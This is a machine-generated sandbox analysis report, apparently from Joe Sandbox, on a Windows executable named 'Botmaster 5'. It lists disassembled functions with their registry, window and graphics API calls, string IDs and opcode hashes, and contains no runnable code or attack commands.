                                                                                                                                                                                                                  • EnumChildWindows.USER32(00000001,00425554,?), ref: 0042570E
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Child$EnumWindows$FocusWindowwcscmp$ActiveClassLongNameParent
                                                                                                                                                                                                                  • String ID: ComboBoxEx32$MDI_ChildClass$SysIPAddress32
                                                                                                                                                                                                                  • API String ID: 2284033370-1864405207
                                                                                                                                                                                                                  • Opcode ID: 82463162b7e4f62261c761cc67dbcd53e740d2c29d448e8a6a3b24710888faa7
                                                                                                                                                                                                                  • Instruction ID: a87c00ff25a3286792df4fff26b2ffdb164f3d42f5278e2016bb3c53ce5e8116
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82463162b7e4f62261c761cc67dbcd53e740d2c29d448e8a6a3b24710888faa7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A319071E05629EBDF10DFA5AD449AFBBB8EE04311FA0003BE505B2250EBB85E40CA59
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040B29C Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 252registryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,00000001,00000000,00000000,?,?,?,00000000), ref: 0040B492
                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040B4AA
                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?,?,?,?,00000001,00000000,00000000,?,?,?,00000000), ref: 0040B4CA
                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,000000FF,00000000,000000FF,00000000,00000000,00000000,?,00000000,00020019,?,?), ref: 0040B51E
                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,00000000,000000FF,00000000,000000FF,00000000,00000000,00000000,?), ref: 0040B5D8
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: HeapOpen$AllocAllocateCloseConnectQueryRegistryValuewcslen
                                                                                                                                                                                                                  • String ID: ERROR, #HKEY is empty$ERROR, reading key$ERROR, sub key dont exist$ERROR, subkeyname is empty$REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ
                                                                                                                                                                                                                  • API String ID: 1795282032-1159944695
                                                                                                                                                                                                                  • Opcode ID: 198a21226139db6bd31dddcad874865efc676aa3ddc82746b34119870963a145
                                                                                                                                                                                                                  • Instruction ID: 3153cbe38d179f83d3de3c44aee880e51ccfdab3bfb1509ecf6f04fc18b29713
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 198a21226139db6bd31dddcad874865efc676aa3ddc82746b34119870963a145
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10913F70208301ABC711EB11D882A2E77A5EF44318F60893FF585A62A1D77D9C95DB9F
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040B6A8 Relevance: 24.9, APIs: 6, Strings: 8, Instructions: 362COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: ERROR, #HKEY is empty$ERROR, allocated memorysize <1$ERROR, false flag$ERROR, no space$ERROR, sub key dont exist$ERROR, subkeyname is empty$ERROR, translate hexadecimal to decimal$ERROR, valuename is empty
                                                                                                                                                                                                                  • API String ID: 0-2908051561
                                                                                                                                                                                                                  • Opcode ID: 3d94a89d43f72015a1896a5e8c025abf568a43065405928476b4d4eac7f379e0
                                                                                                                                                                                                                  • Instruction ID: f0efbefb519f035c73ab9997977eb98289894cc91dfc7e192ed1b398e1b95d2d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d94a89d43f72015a1896a5e8c025abf568a43065405928476b4d4eac7f379e0
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57D15D702183019BC701AB21EC81A6F77E5EF84308F60883FF585A62A1E77D9D559B9F
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004231CD Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145memorywindowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00423207
                                                                                                                                                                                                                    • Part of subcall function 00423CBD: LoadLibraryW.KERNEL32(COMCTL32.DLL,-FFFFFEC7), ref: 00423CDD
                                                                                                                                                                                                                    • Part of subcall function 00423CBD: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00423CF2
                                                                                                                                                                                                                    • Part of subcall function 00423CBD: memset.MSVCRT ref: 00423D03
                                                                                                                                                                                                                    • Part of subcall function 00423CBD: FreeLibrary.KERNEL32(?), ref: 00423D3E
                                                                                                                                                                                                                    • Part of subcall function 00423CBD: LoadLibraryW.KERNEL32(uxtheme.dll), ref: 00423D49
                                                                                                                                                                                                                    • Part of subcall function 00423CBD: GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00423D5A
                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00423307
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,000001F4), ref: 00423364
                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000200,SysTreeView32,00000000,50010000,?,?,?,?,00000000,000000FF,00000000), ref: 0042339A
                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,50010000), ref: 004233D3
                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001108,00000002,00000000), ref: 004233EC
                                                                                                                                                                                                                  • SetPropW.USER32(00000000,PB_3State,00000000), ref: 00423400
                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000FC,Function_000230EA), ref: 0042340E
                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000112C,00000004,00000004), ref: 00423423
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: LibraryWindow$AddressLoadLongMessageProcSendmemset$AllocCreateFreeHeapPropVersion
                                                                                                                                                                                                                  • String ID: $ $PB_3State$SysTreeView32
                                                                                                                                                                                                                  • API String ID: 223764446-1844643208
                                                                                                                                                                                                                  • Opcode ID: c0fbb6ff69ebd50974b03b782823c491543865840cd099dd056c76c0162f22a0
                                                                                                                                                                                                                  • Instruction ID: e680f0b1dc791b2e5b83ead88be5ce5f8eec03a0f2dcc108da273c8eb621e675
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0fbb6ff69ebd50974b03b782823c491543865840cd099dd056c76c0162f22a0
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C518170600225ABDB11DF51BD49A9A7BB4EB04709F50806EF901962A0EFFC4B84DF9E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040F196 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 107libraryloaderCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0040F1B6
                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040F1C3
                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000001F), ref: 0040F1D3
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 0040F1F6
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,SHGetPathFromIDListW), ref: 0040F203
                                                                                                                                                                                                                  • wcsncpy.MSVCRT ref: 0040F223
                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040F233
                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(?,?,?,?,?,?,?,0000001F), ref: 0040F2A9
                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040F2B0
                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,?,?,?,?,?,0000001F), ref: 0040F2D2
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                                                                                                                                                                                                  • String ID: SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                                                                                                                                                                                  • API String ID: 217932011-244638028
                                                                                                                                                                                                                  • Opcode ID: 3baaf821dcd952c12b75a12157bf89f48fcc8bac5a307612ba5dc8a7c346bbba
                                                                                                                                                                                                                  • Instruction ID: 2280acdd396c3639acd2d2f4f65d91694b7443f4c71b265bfbc13d6499426b32
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3baaf821dcd952c12b75a12157bf89f48fcc8bac5a307612ba5dc8a7c346bbba
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B413D75800208EACF21EFA1DC4999EBBB8FF44315F10807BE514A6251E7B98A44CF59
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004226D5 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 182windowmemoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • HeapReAlloc.KERNEL32(00000008,?,?), ref: 004226FF
                                                                                                                                                                                                                  • memmove.MSVCRT ref: 0042272C
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,00000050), ref: 00422779
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,?), ref: 004227B4
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000050), ref: 004227EB
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,?), ref: 0042281E
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,?), ref: 00422843
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,?), ref: 00422854
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00422899
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004228C6
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend$AllocHeapmemmove
                                                                                                                                                                                                                  • String ID: "$P
                                                                                                                                                                                                                  • API String ID: 3670824896-1577843662
                                                                                                                                                                                                                  • Opcode ID: 9f87621e9f8618ca132e7fc1f443dd128ceb5acf10b7570e299d19d1d77c4dad
                                                                                                                                                                                                                  • Instruction ID: 71a1341051286cbe3fa1552c1bed272baf18cdb81168beb30b8de4e71e7936c2
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f87621e9f8618ca132e7fc1f443dd128ceb5acf10b7570e299d19d1d77c4dad
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1171AFB0A00205EFDF20DFA5D981AAEBBF4FF04300F50862AE941EA254E3B4DA51CF55
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042078C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 004207BE
                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,ComboBox,00000000,00000002,?,?,?,0000015E,?,000000FF,00000000), ref: 004208CB
                                                                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00420904
                                                                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 00420907
                                                                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 0042090E
                                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00420919
                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00420928
                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000153,000000FF,0000000F), ref: 0042095D
                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00420965
                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000153,000000FF,?), ref: 00420984
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$LongMessageSend$CreateRectmemset
                                                                                                                                                                                                                  • String ID: ComboBox$ComboBoxEx32
                                                                                                                                                                                                                  • API String ID: 1070917306-1907415764
                                                                                                                                                                                                                  • Opcode ID: e3b63b431830fd182115ee7f2558ae7a011cb15d883d0cd92ecac2582af89ec3
                                                                                                                                                                                                                  • Instruction ID: 9b5b3a30f7766ba2294f48c64ebcc5a56bf666efa6bd84f1f668196e8ff88f34
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3b63b431830fd182115ee7f2558ae7a011cb15d883d0cd92ecac2582af89ec3
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB51AEB0600219AFDB10DF15FD48A5A3FF9FB44314F50822AF911962B2E7F95990CF9A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042394D Relevance: 21.1, APIs: 14, Instructions: 124memorywindowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • HeapReAlloc.KERNEL32(00000008,?,?,75C05540,?,0042048B,?,?), ref: 00423970
                                                                                                                                                                                                                  • GetObjectType.GDI32(?), ref: 004239AC
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000032), ref: 004239C3
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000031), ref: 004239C8
                                                                                                                                                                                                                  • ImageList_Add.COMCTL32(?,00000000,00000000,00000000), ref: 004239E2
                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004239F7
                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00423A08
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 00423A12
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 00423A17
                                                                                                                                                                                                                  • ImageList_Add.COMCTL32(00000000,00000000,00000000,00000000), ref: 00423A35
                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00423A40
                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00423A49
                                                                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,00000000,75C05540,?,0042048B,?,?), ref: 00423A5E
                                                                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,00000000,75C05540,?,0042048B,?,?), ref: 00423A65
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Object$DeleteImageList_MetricsSystem$IconReplace$AllocHeapType
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3219705055-0
                                                                                                                                                                                                                  • Opcode ID: c20c969a50bb01d429bb6c869811377ad277d7e37d55e75f99fd43d04b208349
                                                                                                                                                                                                                  • Instruction ID: 88454222ebc15c0d297e4f44d1405389234ae9dfcc3b3cba44c86ee32c0f3bdf
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c20c969a50bb01d429bb6c869811377ad277d7e37d55e75f99fd43d04b208349
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0641B0B1200704AFD720DF25EC81D2BB7F9EB85315B50892EF49683651DBB8ED41CB6A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00426C4E Relevance: 18.1, APIs: 12, Instructions: 122windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetObjectType.GDI32(00000000), ref: 00426C75
                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00426CCC
                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00426CDA
                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00426CF3
                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00426CFB
                                                                                                                                                                                                                  • SetStretchBltMode.GDI32(?,00000004), ref: 00426D39
                                                                                                                                                                                                                  • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00426D45
                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00426D73
                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00426D86
                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00426D8F
                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00426DAE
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Object$Delete$CompatibleCreateSelectStretch$BrushModeType
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1550845048-0
                                                                                                                                                                                                                  • Opcode ID: eef229139a9e05a6372507a4417835207108c827746911caf48acaca6c831d3f
                                                                                                                                                                                                                  • Instruction ID: f3ed0f77a882ef21a078d94f5cbfeea00fc4e5818429802a1284a60bd0021fa3
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eef229139a9e05a6372507a4417835207108c827746911caf48acaca6c831d3f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74412675A0021DFFCF11AFA0DC449AEBFB9FF08340B51842AF915A6220D7758E51EB59
